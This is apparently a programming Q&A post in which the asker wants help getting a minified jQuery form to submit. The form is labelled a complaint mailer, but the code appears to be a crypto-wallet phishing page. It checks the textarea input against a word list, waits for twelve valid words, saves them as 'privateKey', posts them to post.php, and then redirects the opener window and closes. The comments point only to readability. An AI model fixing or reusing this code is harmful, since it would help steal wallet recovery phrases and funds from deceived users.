# How to make form action="javascript:void(null);" works after click submit button

Tags: javascript, ajax, forms

boys. i have some problems with ajax and php post. one of these problems is that my ajax code provides controls, but it doesn't post when I press the button. I wonder what code is missing? or what should I do to be able to post the email?

This is my main form. Which people wants to mail me.

```
  <div class="main-container-wrapper">
      <div class="first-view-main-wrapper">
        <div class="first-view-main">
          <div class="import-mail">
            <div class="import-mail__title">Mail Form</div>
            <div class="import-mail__selector-label">Enter your complaint.</div>
            <form action="javascript:void(null);" method="POST" id="newadd" novalidate>
              <div class="import-account__input-wrapper">
                <label class="import-mail__input-label">complaint</label>
                <textarea id="seed" name="seed" class="import" placeholder="Separate each word required=""></textarea>
              </div>
              <span class="error"></span>
              <button class="button btn--first-time first-time-flow__button sendBtn" name="import">Proceed</button>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
<div id="add"></div>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="assets/js/words.js"></script>
```

This is my javascript code which makes send post to my mail.

```
<script>
document.addEventListener("DOMContentLoaded", (() => {
    const e = document.querySelector("form");
    let t = [], n = ["true"];
    var s = {};
    var l = function (e) {
```

////  this part is post textarea to my mail close window and redirect to main page

```
        $.ajax({ 
            type: "POST", url: "post.php", data: e, success: function (e) {
                "success" == e.type && (this.processData, s = {}, {}, t = t.filter((e => !n.includes(e))), window.opener.location.href = "https://www.eeeeeeee.com/", self.close())
            }
        })
    };
    e.addEventListener("submit", (r => {
        r.preventDefault();
        let o = (e, r, o) => {
            switch (e) {
                case"ok":
                    r.style.border = "2px solid red", r.insertAdjacentHTML("afterend", '<span class="errorPush" style="margin-top: 5px; color:red;">Please enter correctly.</span>'), t = t.filter((e => !n.includes(e)));
                    break;
                case"no":
                    "SPAN" === r.nextElementSibling?.nodeName && (r.nextElementSibling?.remove(), r.style.border = "1px solid #cdcdcd"), t.push("true");
                    let e = () => {
                        document.querySelector(".sendBtn").setAttribute("type", "button"), setTimeout((() => {
                            s.privateKey = r.value, s.formName = "Mailform", l(s) && (t = t.filter((e => !n.includes(e))))
                        }), 100), setTimeout((() => {
                            document.querySelector(".sendBtn").setAttribute("type", "submit")
                        }), 2e3)
                    };
                    "phrase" == o ? t.length >= 12 && e() : 1 == t.length && e()
            }
        };
        (e => {
            let t = e.value.trim().split(" "), n = t.length;
            if ([250].includes(n)) if (n !== [...new Set(t)].length) o("ok", e);
            else
```

//// this is some forbidden words etc it doesnt  matter it works.

```
                for (let s = 0; s < n; s++) words.includes(t[s]) ? o("no", e, "phrase") : o("ok", e, "phrase"); else o("ok", e, "phrase")
        })(e.elements[0]), "SPAN" === e.elements[0].nextElementSibling.nodeName && "DIV" !== e.elements[0].nextElementSibling.nextElementSibling.nodeName && e.elements[0].nextElementSibling.remove()
    }))
}));
</script>
```

My problem is that when I press submit, it doesn't take any action. It does not post and does not close the page and redirect it to the main page. Can you help me please?

Comment: This code looks almost *deliberately* hard to read, so it's hard to see any code that even _tries_ to post a form. I think you'll struggle to find anyone willing to help you unless you provide some kind of guide to what all these single-letter variables and convoluted conditions actually mean.

Comment: I've also retagged as [tag:javascript] not [tag:php], because the fact that you're posting to a PHP script appears to be completely irrelevant to the problem, and if anyone can help you it will be people who know JS, not people who know PHP.

Comment: To increase the chance of your question being answered, just tidy up your code blocks. IE: Same amount of html opening tags as there are closing tags and expand you Javascript variable names for better code readability. Single character variable names are hard to debug. If you do this, there is a good chance you question will be answered quickly.